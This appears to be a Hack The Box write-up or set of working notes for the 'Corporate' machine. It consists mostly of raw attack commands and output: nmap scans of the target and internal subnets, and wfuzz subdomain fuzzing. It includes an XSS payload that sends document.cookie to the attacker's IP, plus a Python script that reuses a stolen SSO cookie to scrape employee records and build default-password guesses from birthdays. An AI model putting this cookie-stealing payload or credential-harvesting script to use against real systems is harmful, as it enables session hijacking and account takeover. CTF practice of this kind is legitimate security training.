HTB-Corporate（Insane）

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]└─$ sudo nmap -p- --min-rate 10000 10.10.11.246[sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 07:43 ESTNmap scan report for 10.10.11.246Host is up (0.67s latency).Not shown: 65534 filtered tcp ports (no-response)PORT   STATE SERVICE80/tcp open  httpNmap done: 1 IP address (1 host up) scanned in 40.26 seconds

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]└─$ wfuzz -H "Host: FUZZ.corporate.htb"  --hw 11 -c -z file,"/home/kali/wordlists/subdomains-top1million-5000.txt"  http://corporate.htb/ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer                         *********************************************************Target: http://corporate.htb/Total requests: 4992=====================================================================ID           Response   Lines    Word       Chars       Payload                                                                                                                    =====================================================================000000035:   200        38 L     175 W      1725 Ch     "support"                                                                                                                  000000287:   302        0 L      4 W        38 Ch       "sso"                                                                                                                      000000263:   403        7 L      9 W        159 Ch      "git"                                                                                                                      000000847:   302        0 L      4 W        32 Ch       "people"

<a href="http://corporate.htb/<script+src='/vendor/analytics.min.js'></script><script+src='/assets/js/analytics.min.js?v=document.location=`http://10.10.14.51:8888/${document.cookie}`'</script>" id="send-message">

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]└─$ nmap --iflistStarting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:21 EST************************INTERFACES************************DEV     (SHORT)   IP/MASK                      TYPE        UP MTU   MAClo      (lo)      127.0.0.1/8                  loopback    up 65536lo      (lo)      ::1/128                      loopback    up 65536eth0    (eth0)    192.168.141.148/24           ethernet    up 1500  00:0C:29:8F:3C:7Eeth0    (eth0)    fe80::ef9f:8e93:2e6c:2f82/64 ethernet    up 1500  00:0C:29:8F:3C:7Edocker0 (docker0) 172.17.0.1/16                ethernet    up 1500  02:42:27:7F:7D:71tun0    (tun0)    10.10.14.51/23               point2point up 1500tun0    (tun0)    fe80::9a24:40b8:dfbb:ab7/64  point2point up 1500tun0    (tun0)    dead:beef:2::1031/64         point2point up 1500tun1    (tun1)    10.8.0.7/24                  point2point up 1500tun1    (tun1)    fe80::8aa0:d8ea:1934:c42a/64 point2point up 1500**************************ROUTES**************************DST/MASK                      DEV     METRIC GATEWAY10.8.0.0/24                   tun1    010.9.0.0/24                   tun1    0      10.8.0.1192.168.141.0/24              eth0    10010.10.10.0/23                 tun0    0      10.10.14.110.10.14.0/23                 tun0    010.129.0.0/16                 tun0    0      10.10.14.1172.17.0.0/16                 docker0 00.0.0.0/0                     eth0    100    192.168.141.2::1/128                       lo      0dead:beef:2::1031/128         tun0    0fe80::8aa0:d8ea:1934:c42a/128 tun1    0fe80::9a24:40b8:dfbb:ab7/128  tun0    0fe80::ef9f:8e93:2e6c:2f82/128 eth0    0dead:beef:2::/64              tun0    256fe80::/64                     tun0    256fe80::/64                     tun1    256dead:beef::/64                tun0    1024fe80::/64                     eth0    1024ff00::/8                      eth0    256ff00::/8                      tun0    256ff00::/8                      tun1    256

┌──(kali㉿kali)-[~/Desktop/htb/Corporate]└─$ sudo nmap -p- --min-rate 10000 10.8.0.0/24[sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:21 ESTWarning: 10.8.0.1 giving up on port because retransmission cap hit (10).Warning: 10.8.0.2 giving up on port because retransmission cap hit (10).Warning: 10.8.0.3 giving up on port because retransmission cap hit (10).Warning: 10.8.0.4 giving up on port because retransmission cap hit (10).Nmap scan report for 10.8.0.1Host is up (0.33s latency).Not shown: 64357 closed tcp ports (reset), 1170 filtered tcp ports (no-response)PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http389/tcp  open  ldap636/tcp  open  ldapssl2049/tcp open  nfs3004/tcp open  csoftragent3128/tcp open  squid-http8006/tcp open  wpl-analyticsNmap scan report for 10.8.0.2Host is up (0.37s latency).All 65535 scanned ports on 10.8.0.2 are in ignored states.Not shown: 64425 closed tcp ports (reset), 1110 filtered tcp ports (no-response)Nmap scan report for 10.8.0.3Host is up (0.41s latency).Not shown: 64338 closed tcp ports (reset), 1195 filtered tcp ports (no-response)PORT     STATE SERVICE8006/tcp open  wpl-analytics8888/tcp open  sun-answerbookNmap scan report for 10.8.0.4Host is up (0.70s latency).Not shown: 64497 closed tcp ports (reset), 1037 filtered tcp ports (no-response)PORT   STATE SERVICE22/tcp open  sshNmap scan report for 10.8.0.7Host is up (0.000012s latency).All 65535 scanned ports on 10.8.0.7 are in ignored states.Not shown: 65535 closed tcp ports (reset)Nmap done: 256 IP addresses (5 hosts up) scanned in 149.27 seconds┌──(kali㉿kali)-[~/Desktop/htb/Corporate]└─$  sudo nmap -p- --min-rate 10000 10.9.0.0/24Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:24 ESTWarning: 10.9.0.4 giving up on port because retransmission cap hit (10).Warning: 10.9.0.1 giving up on port because retransmission cap hit (10).Nmap scan report for 10.9.0.1Host is up (0.29s latency).Not shown: 64884 closed tcp ports (reset), 643 filtered tcp ports (no-response)PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http389/tcp  open  ldap636/tcp  open  ldapssl2049/tcp open  nfs3004/tcp open  csoftragent3128/tcp open  squid-http8006/tcp open  wpl-analyticsNmap scan report for 10.9.0.4Host is up (0.29s latency).Not shown: 65012 closed tcp ports (reset), 521 filtered tcp ports (no-response)PORT    STATE SERVICE22/tcp  open  ssh111/tcp open  rpcbindNmap done: 256 IP addresses (2 hosts up) scanned in 47.83 seconds

import reimport requestsstart = 5000end = 6000userpasswordlist_file = "userpasswordlist.txt"custom_cookie = "CorporateSSO=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NTA3NywibmFtZSI6IkNlY2VsaWEiLCJzdXJuYW1lIjoiV2VzdCIsImVtYWlsIjoiQ2VjZWxpYS5XZXN0QGNvcnBvcmF0ZS5odGIiLCJyb2xlcyI6WyJzYWxlcyJdLCJyZXF1aXJlQ3VycmVudFBhc3N3b3JkIjp0cnVlLCJpYXQiOjE3MDMzMTE2NjAsImV4cCI6MTcwMzM5ODA2MH0.0Y55Nhk8W5DKIHqbi3plxzBtwdAGq3C9x2Y9fhxdev8; session=eyJmbGFzaGVzIjp7ImluZm8iOltdLCJlcnJvciI6W10sInN1Y2Nlc3MiOltdfX0=; session.sig=UDEZUiAvbn45P9_AxzLVFkXELfM"headers = {"Cookie": custom_cookie}# 循环访问URL并匹配邮箱和生日日期for i in range(start, end + 1):    url = f"http://people.corporate.htb/employee/{i}"    response = requests.get(url, headers=headers)    content = response.text    # 匹配邮箱并保存到userlist.txt    email_match = re.search(r'<a href="mailto:(.*?)">', content)    # 匹配生日日期并保存到password.txt    birthday_match = re.search(        r'<th scope="row">Birthday</th>s+<td>(.*?)</td>', content    )    if birthday_match and email_match:        email = email_match.group(1).split("@")[0]        birthday = birthday_match.group(1)        match = re.match(r"(d+)/(d+)/(d+)", birthday)        month = match.group(1)        day = match.group(2)        year = match.group(3)        birthday = day + month + year        with open(userpasswordlist_file, "a") as file:            file.write(email + " CorporateStarter" + birthday + "n")